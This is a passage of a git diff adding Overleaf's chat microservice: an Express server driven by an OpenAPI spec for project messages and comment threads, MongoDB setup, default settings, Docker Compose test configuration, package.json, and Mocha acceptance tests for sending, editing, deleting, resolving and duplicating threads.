mongoClient.db() + +export const db = { + messages: mongoDb.collection('messages'), + rooms: mongoDb.collection('rooms'), +} + +Metrics.mongodb.monitor(mongoClient) diff --git a/services/chat/app/js/server.js b/services/chat/app/js/server.js new file mode 100644 index 0000000..80970fc --- /dev/null +++ b/services/chat/app/js/server.js @@ -0,0 +1,51 @@ +import http from 'node:http' +import metrics from '@overleaf/metrics' +import logger from '@overleaf/logger' +import express from 'express' +import exegesisExpress from 'exegesis-express' +import path from 'node:path' +import { fileURLToPath } from 'node:url' +import * as messagesController from './Features/Messages/MessageHttpController.js' + +const __dirname = fileURLToPath(new URL('.', import.meta.url)) + +logger.initialize('chat') +metrics.open_sockets.monitor() + +metrics.leaked_sockets.monitor(logger) + +export async function createServer() { + const app = express() + + app.use(metrics.http.monitor(logger)) + metrics.injectMetricsRoute(app) + + // See https://github.com/exegesis-js/exegesis/blob/master/docs/Options.md + const options = { + controllers: { messagesController }, + ignoreServers: true, + allowMissingControllers: false, + } + + // const exegesisMiddleware = await exegesisExpress.middleware( + const exegesisMiddleware = await exegesisExpress.middleware( + path.resolve(__dirname, '../../chat.yaml'), + options + ) + + // If you have any body parsers, this should go before them. + app.use(exegesisMiddleware) + + // Return a 404 + app.use((req, res) => { + res.status(404).json({ message: `Not found` }) + }) + + // Handle any unexpected errors + app.use((err, req, res, next) => { + res.status(500).json({ message: `Internal error: ${err.message}` }) + }) + + const server = http.createServer(app) + return { app, server } +} diff --git a/services/chat/app/js/util/promises.js b/services/chat/app/js/util/promises.js new file mode 100644 index 0000000..fd46c8c --- /dev/null +++ b/services/chat/app/js/util/promises.js @@ -0,0 +1,10 @@ +/** + * Transform an async function into an Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +export function expressify(fn) { + return (req, res, next) => { + fn(req, res, next).catch(next) + } +} diff --git a/services/chat/buildscript.txt b/services/chat/buildscript.txt new file mode 100644 index 0000000..1dc88e9 --- /dev/null +++ b/services/chat/buildscript.txt @@ -0,0 +1,9 @@ +chat +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/chat/chat.yaml b/services/chat/chat.yaml new file mode 100644 index 0000000..35ed3d3 --- /dev/null +++ b/services/chat/chat.yaml @@ -0,0 +1,416 @@ +openapi: 3.1.0 +x-stoplight: + id: okoe8mh50pjec +info: + title: chat + version: '1.0' +servers: + - url: 'http://chat:3010' +x-exegesis-controller: messagesController +paths: + '/project/{projectId}/messages': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get Global messages + tags: [] + responses: + '201': + description: OK + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/Message' + operationId: getGlobalMessages + description: Get global messages for the project with Project ID provided + parameters: + - schema: + type: string + in: query + name: before + - schema: + type: string + in: query + name: limit + post: + summary: Send Global message + operationId: sendGlobalMessage + responses: + '201': + description: OK + requestBody: + content: + application/json: + schema: + $ref: '#/components/schemas/Message' + examples: + example-1: + value: + user_id: string + content: string + description: 'UserID and Content of the message to be posted. ' + description: Send global message for the project with Project ID provided + '/project/{projectId}/thread/{threadId}/messages': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Send message + operationId: sendMessage + responses: + '201': + description: Created + description: Add a message to the thread with thread ID provided from the Project with Project ID provided. + requestBody: + content: + application/json: + schema: + $ref: '#/components/schemas/Message' + description: |- + JSON object with : + - user_id: Id of the user + - content: Content of the message + '/project/{projectId}/threads': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get Threads + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/Thread' + examples: {} + '404': + description: Not Found + operationId: getThreads + description: Get the list of threads for the project with Project ID provided + '/project/{projectId}/thread/{threadId}/messages/{messageId}/edit': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + post: + summary: Edit message + operationId: editMessage + responses: + '204': + description: No Content + '404': + description: Not Found + requestBody: + content: + application/json: + schema: + type: object + properties: + content: + type: string + user_id: + type: string + readOnly: true + required: + - content + examples: {} + description: |- + JSON object with : + - content: Content of the message to edit + - user_id: Id of the user (optional) + description: | + Update message with Message ID provided from the Thread ID and Project ID provided + '/project/{projectId}/thread/{threadId}/messages/{messageId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + delete: + summary: Delete message + operationId: deleteMessage + responses: + '204': + description: No Content + description: 'Delete message with Message ID provided, from the Thread with ThreadID and ProjectID provided' + '/project/{projectId}/thread/{threadId}/user/{userId}/messages/{messageId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: userId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + delete: + summary: Delete message written by a given user + operationId: deleteUserMessage + responses: + '204': + description: No Content + '/project/{projectId}/thread/{threadId}/resolve': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Resolve Thread + operationId: resolveThread + responses: + '204': + description: No Content + requestBody: + content: + application/json: + schema: + type: object + properties: + user_id: + type: string + required: + - user_id + description: |- + JSON object with : + - user_id: Id of the user. + description: Mark Thread with ThreadID and ProjectID provided owned by the user with UserID provided as resolved. + '/project/{projectId}/thread/{threadId}/reopen': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Reopen Thread + operationId: reopenThread + responses: + '204': + description: No Content + description: |- + Reopen Thread with ThreadID and ProjectID provided. + i.e unmark it as resolved. + '/project/{projectId}/thread/{threadId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + delete: + summary: Delete thread + operationId: deleteThread + responses: + '204': + description: No Content + description: Delete thread with ThreadID and ProjectID provided + '/project/{projectId}/resolved-thread-ids': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get resolved thread ids + operationId: getResolvedThreadIds + responses: + '200': + description: Resolved thread ids + '/project/{projectId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + delete: + summary: Destroy project + operationId: destroyProject + responses: + '204': + description: No Content + description: 'Delete all threads from Project with Project ID provided, and all messages in those threads.' + /status: + get: + summary: Check status + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: string + description: chat is alive + operationId: getStatus + description: Check that the Chat service is alive + head: + summary: Check status + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: string + description: chat is alive + operationId: getStatus + description: Check that the Chat service is alive + '/project/{projectId}/duplicate-comment-threads': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + post: + summary: Duplicate comment threads + operationId: duplicateCommentThreads + requestBody: + content: + application/json: + schema: + type: object + properties: + threads: + type: array + items: + type: string + responses: + '200': + content: + application/json: + schema: + type: object + properties: + newThreads: + type: object + description: Mapping of old thread ids to their duplicated thread ids + description: Duplicate a list of comment threads + '/project/{projectId}/generate-thread-data': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + post: + summary: Generate thread data to load into the frontend + operationId: generateThreadData + requestBody: + content: + application/json: + schema: + type: object + properties: + threads: + type: array + items: + type: string + responses: + '200': + content: + application/json: + schema: + type: object + description: Load threads and generate a json blob containing all messages in all the threads +components: + schemas: + Message: + title: Message + x-stoplight: + id: ue9n1vvezlutw + type: object + examples: + - user_id: string + - content: string + properties: + user_id: + type: string + content: + type: string + required: + - user_id + - content + Thread: + title: Thread + x-stoplight: + id: 0ppt3jw4h5bua + type: array + items: + $ref: '#/components/schemas/Message' diff --git a/services/chat/config/settings.defaults.cjs b/services/chat/config/settings.defaults.cjs new file mode 100644 index 0000000..4b7dc29 --- /dev/null +++ b/services/chat/config/settings.defaults.cjs @@ -0,0 +1,33 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + chat: { + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + port: 3010, + }, + }, + + apis: { + web: { + url: `http://${process.env.WEB_HOST || '127.0.0.1'}:${ + process.env.WEB_PORT || 3000 + }`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/chat/docker-compose.ci.yml b/services/chat/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/chat/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/chat/docker-compose.yml b/services/chat/docker-compose.yml new file mode 100644 index 0000000..b830d25 --- /dev/null +++ b/services/chat/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/chat + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/chat + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/chat + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/chat + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/chat/package.json b/services/chat/package.json new file mode 100644 index 0000000..f3d37eb --- /dev/null +++ b/services/chat/package.json @@ -0,0 +1,49 @@ +{ + "name": "@overleaf/chat", + "description": "The backend API that powers Overleaf chat", + "private": true, + "main": "app.js", + "type": "module", + "scripts": { + "start": "node app.js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "exegesis-express": "^4.0.0", + "express": "^4.21.2", + "mongodb": "6.12.0" + }, + "devDependencies": { + "acorn": "^7.1.1", + "ajv": "^6.12.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "request": "^2.88.2", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "timekeeper": "^2.2.0", + "typescript": "^5.0.4" + }, + "version": "1.0.0", + "directories": { + "test": "test" + }, + "keywords": [], + "author": "", + "license": "AGPL-3.0" +} diff --git a/services/chat/test/acceptance/js/CloningCommentThreadsTests.js b/services/chat/test/acceptance/js/CloningCommentThreadsTests.js new file mode 100644 index 0000000..f4adde1 --- /dev/null +++ b/services/chat/test/acceptance/js/CloningCommentThreadsTests.js @@ -0,0 +1,93 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +const user1Id = new ObjectId().toString() +const user2Id = new ObjectId().toString() + +async function createCommentThread(projectId, threadId = new ObjectId()) { + const { response: response1 } = await ChatClient.sendMessage( + projectId, + threadId.toString(), + user1Id, + 'message 1' + ) + expect(response1.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId, + user2Id, + 'message 2' + ) + expect(response2.statusCode).to.equal(201) + return threadId.toString() +} + +describe('Cloning comment threads', async function () { + const projectId = new ObjectId().toString() + + before(async function () { + await ChatApp.ensureRunning() + this.thread1Id = await createCommentThread(projectId) + this.thread2Id = await createCommentThread(projectId) + this.thread3Id = await createCommentThread(projectId) + }) + + describe('with non-orphaned threads', async function () { + before(async function () { + const { + response: { body: result, statusCode }, + } = await ChatClient.duplicateCommentThreads(projectId, [this.thread3Id]) + this.result = result + expect(statusCode).to.equal(200) + expect(this.result).to.have.property('newThreads') + this.newThreadId = this.result.newThreads[this.thread3Id].duplicateId + }) + + it('should duplicate threads', function () { + expect(this.result.newThreads).to.have.property(this.thread3Id) + expect(this.result.newThreads[this.thread3Id]).to.have.property( + 'duplicateId' + ) + expect(this.result.newThreads[this.thread3Id].duplicateId).to.not.equal( + this.thread3Id + ) + }) + + it('should not duplicate other threads threads', function () { + expect(this.result.newThreads).to.not.have.property(this.thread1Id) + expect(this.result.newThreads).to.not.have.property(this.thread2Id) + }) + + it('should duplicate the messages in the thread', async function () { + const { + response: { body: threads }, + } = await ChatClient.getThreads(projectId) + function ignoreId(comment) { + return { + ...comment, + id: undefined, + } + } + expect(threads[this.thread3Id].messages.map(ignoreId)).to.deep.equal( + threads[this.newThreadId].messages.map(ignoreId) + ) + }) + + it('should have two separate unlinked threads', async function () { + await ChatClient.sendMessage( + projectId, + this.newThreadId, + user1Id, + 'third message' + ) + const { + response: { body: threads }, + } = await ChatClient.getThreads(projectId) + expect(threads[this.thread3Id].messages.length).to.equal(2) + expect(threads[this.newThreadId].messages.length).to.equal(3) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DeletingAMessageTests.js b/services/chat/test/acceptance/js/DeletingAMessageTests.js new file mode 100644 index 0000000..9a4a060 --- /dev/null +++ b/services/chat/test/acceptance/js/DeletingAMessageTests.js @@ -0,0 +1,47 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Deleting a message', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('in a thread', async function () { + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'first message' + ) + expect(response.statusCode).to.equal(201) + const { response: response2, body: message } = + await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'deleted message' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.deleteMessage( + projectId, + threadId, + message.id + ) + expect(response3.statusCode).to.equal(204) + }) + + it('should then remove the message from the threads', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DeletingAThreadTests.js b/services/chat/test/acceptance/js/DeletingAThreadTests.js new file mode 100644 index 0000000..c199218 --- /dev/null +++ b/services/chat/test/acceptance/js/DeletingAThreadTests.js @@ -0,0 +1,38 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Deleting a thread', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a thread that is deleted', async function () { + const threadId = new ObjectId().toString() + const content = 'deleted thread message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.deleteThread( + projectId, + threadId + ) + expect(response2.statusCode).to.equal(204) + }) + + it('should then not list the thread for the project', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(0) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DestroyingAProjectTests.js b/services/chat/test/acceptance/js/DestroyingAProjectTests.js new file mode 100644 index 0000000..95c6c35 --- /dev/null +++ b/services/chat/test/acceptance/js/DestroyingAProjectTests.js @@ -0,0 +1,66 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +const db = ChatApp.db + +async function getMessage(messageId) { + return await db.messages.findOne({ + _id: new ObjectId(messageId), + }) +} + +describe('Destroying a project', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a project that has threads and messages', async function () { + const threadId = new ObjectId().toString() + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'destroyed thread message' + ) + expect(response.statusCode).to.equal(201) + this.threadMessageId = response.body.id + const { response: response2 } = await ChatClient.sendGlobalMessage( + projectId, + userId, + 'destroyed global message' + ) + expect(response2.statusCode).to.equal(201) + this.globalThreadMessageId = response2.body.id + + const threadRooms = await db.rooms + .find({ project_id: new ObjectId(projectId) }) + .toArray() + expect(threadRooms.length).to.equal(2) + const threadMessage = await getMessage(this.threadMessageId) + expect(threadMessage).to.exist + const globalThreadMessage = await getMessage(this.globalThreadMessageId) + expect(globalThreadMessage).to.exist + + const { response: responseDestroy } = + await ChatClient.destroyProject(projectId) + expect(responseDestroy.statusCode).to.equal(204) + }) + + it('should remove the messages and threads from the database', async function () { + const threadRooms = await db.rooms + .find({ project_id: new ObjectId(projectId) }) + .toArray() + expect(threadRooms.length).to.equal(0) + const threadMessage = await getMessage(this.threadMessageId) + expect(threadMessage).to.be.null + const globalThreadMessage = await getMessage(this.globalThreadMessageId) + expect(globalThreadMessage).to.be.null + }) + }) +}) diff --git a/services/chat/test/acceptance/js/EditingAMessageTests.js b/services/chat/test/acceptance/js/EditingAMessageTests.js new file mode 100644 index 0000000..39f7edb --- /dev/null +++ b/services/chat/test/acceptance/js/EditingAMessageTests.js @@ -0,0 +1,96 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Editing a message', async function () { + let projectId, userId, threadId + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('in a thread', async function () { + const content = 'thread message' + const newContent = 'updated thread message' + let messageId + beforeEach(async function () { + projectId = new ObjectId().toString() + userId = new ObjectId().toString() + threadId = new ObjectId().toString() + + const { response, body: message } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + expect(message.id).to.exist + expect(message.content).to.equal(content) + messageId = message.id + }) + + describe('without user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessage( + projectId, + threadId, + messageId, + newContent + ) + expect(response.statusCode).to.equal(204) + }) + + it('should then list the updated message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(newContent) + }) + }) + + describe('with the same user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessageWithUser( + projectId, + threadId, + messageId, + userId, + newContent + ) + expect(response.statusCode).to.equal(204) + }) + + it('should then list the updated message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(newContent) + }) + }) + + describe('with another user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessageWithUser( + projectId, + threadId, + messageId, + new ObjectId(), + newContent + ) + expect(response.statusCode).to.equal(404) + }) + + it('should then list the old message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(content) + }) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/GettingMessagesTests.js b/services/chat/test/acceptance/js/GettingMessagesTests.js new file mode 100644 index 0000000..4fb20da --- /dev/null +++ b/services/chat/test/acceptance/js/GettingMessagesTests.js @@ -0,0 +1,164 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +async function getCount() { + return await ChatClient.getMetric(line => { + return ( + line.includes('timer_http_request_count') && + line.includes('path="project_{projectId}_messages"') && + line.includes('method="POST"') + ) + }) +} + +describe('Getting messages', async function () { + const userId1 = new ObjectId().toString() + const userId2 = new ObjectId().toString() + const content1 = 'foo bar' + const content2 = 'hello world' + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('globally', async function () { + const projectId = new ObjectId().toString() + before(async function () { + const previousCount = await getCount() + const { response } = await ChatClient.sendGlobalMessage( + projectId, + userId1, + content1 + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendGlobalMessage( + projectId, + userId2, + content2 + ) + expect(response2.statusCode).to.equal(201) + const { response: response3, body } = await ChatClient.checkStatus() + expect(response3.statusCode).to.equal(200) + expect(body).to.equal('chat is alive') + expect(await getCount()).to.equal(previousCount + 2) + }) + + it('should contain the messages and populated users when getting the messages', async function () { + const { response, body: messages } = + await ChatClient.getGlobalMessages(projectId) + expect(response.statusCode).to.equal(200) + expect(messages.length).to.equal(2) + messages.reverse() + expect(messages[0].content).to.equal(content1) + expect(messages[0].user_id).to.equal(userId1) + expect(messages[1].content).to.equal(content2) + expect(messages[1].user_id).to.equal(userId2) + }) + }) + + describe('from all the threads', async function () { + const projectId = new ObjectId().toString() + const threadId1 = new ObjectId().toString() + const threadId2 = new ObjectId().toString() + + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'one' + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'two' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'three' + ) + expect(response3.statusCode).to.equal(201) + const { response: response4 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'four' + ) + expect(response4.statusCode).to.equal(201) + }) + + it('should contain a dictionary of threads with messages with populated users', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(2) + const thread1 = threads[threadId1] + expect(thread1.messages.length).to.equal(2) + const thread2 = threads[threadId2] + expect(thread2.messages.length).to.equal(2) + + expect(thread1.messages[0].content).to.equal('one') + expect(thread1.messages[0].user_id).to.equal(userId1) + expect(thread1.messages[1].content).to.equal('three') + expect(thread1.messages[1].user_id).to.equal(userId1) + + expect(thread2.messages[0].content).to.equal('two') + expect(thread2.messages[0].user_id).to.equal(userId2) + expect(thread2.messages[1].content).to.equal('four') + expect(thread2.messages[1].user_id).to.equal(userId2) + }) + }) + + describe('from a list of threads', function () { + const projectId = new ObjectId().toString() + const threadId1 = new ObjectId().toString() + const threadId2 = new ObjectId().toString() + const threadId3 = new ObjectId().toString() + + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'one' + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'two' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'three' + ) + expect(response3.statusCode).to.equal(201) + }) + + it('should contain a dictionary of threads with messages with populated users', async function () { + const { response, body: threads } = await ChatClient.generateThreadData( + projectId, + [threadId1, threadId3] + ) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(1) + const thread1 = threads[threadId1] + expect(thread1.messages.length).to.equal(2) + + expect(thread1.messages[0].content).to.equal('one') + expect(thread1.messages[0].user_id).to.equal(userId1) + expect(thread1.messages[1].content).to.equal('three') + expect(thread1.messages[1].user_id).to.equal(userId1) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/ResolvingAThreadTests.js b/services/chat/test/acceptance/js/ResolvingAThreadTests.js new file mode 100644 index 0000000..208d232 --- /dev/null +++ b/services/chat/test/acceptance/js/ResolvingAThreadTests.js @@ -0,0 +1,114 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Resolving a thread', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a resolved thread', async function () { + const threadId = new ObjectId().toString() + const content = 'resolved message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.resolveThread( + projectId, + threadId, + userId + ) + expect(response2.statusCode).to.equal(204) + }) + + it('should then list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.equal(true) + expect(threads[threadId].resolved_by_user_id).to.equal(userId) + const resolvedAt = new Date(threads[threadId].resolved_at) + expect(new Date() - resolvedAt).to.be.below(1000) + }) + + it('should list the thread id in the resolved thread ids endpoint', async function () { + const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).to.include(threadId) + }) + }) + + describe('when a thread is not resolved', async function () { + const threadId = new ObjectId().toString() + const content = 'open message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + }) + + it('should not list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.be.undefined + }) + + it('should not list the thread in the resolved thread ids endpoint', async function () { + const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).not.to.include(threadId) + }) + }) + + describe('when a thread is resolved then reopened', async function () { + const threadId = new ObjectId().toString() + const content = 'resolved message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.resolveThread( + projectId, + threadId, + userId + ) + expect(response2.statusCode).to.equal(204) + const { response: response3 } = await ChatClient.reopenThread( + projectId, + threadId + ) + expect(response3.statusCode).to.equal(204) + }) + + it('should not list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.be.undefined + }) + + it('should not list the thread in the resolved thread ids endpoint', async function () { + const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).not.to.include(threadId) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/SendingAMessageTests.js b/services/chat/test/acceptance/js/SendingAMessageTests.js new file mode 100644 index 0000000..7dbc1df --- /dev/null +++ b/services/chat/test/acceptance/js/SendingAMessageTests.js @@ -0,0 +1,143 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Sending a message', async function () { + 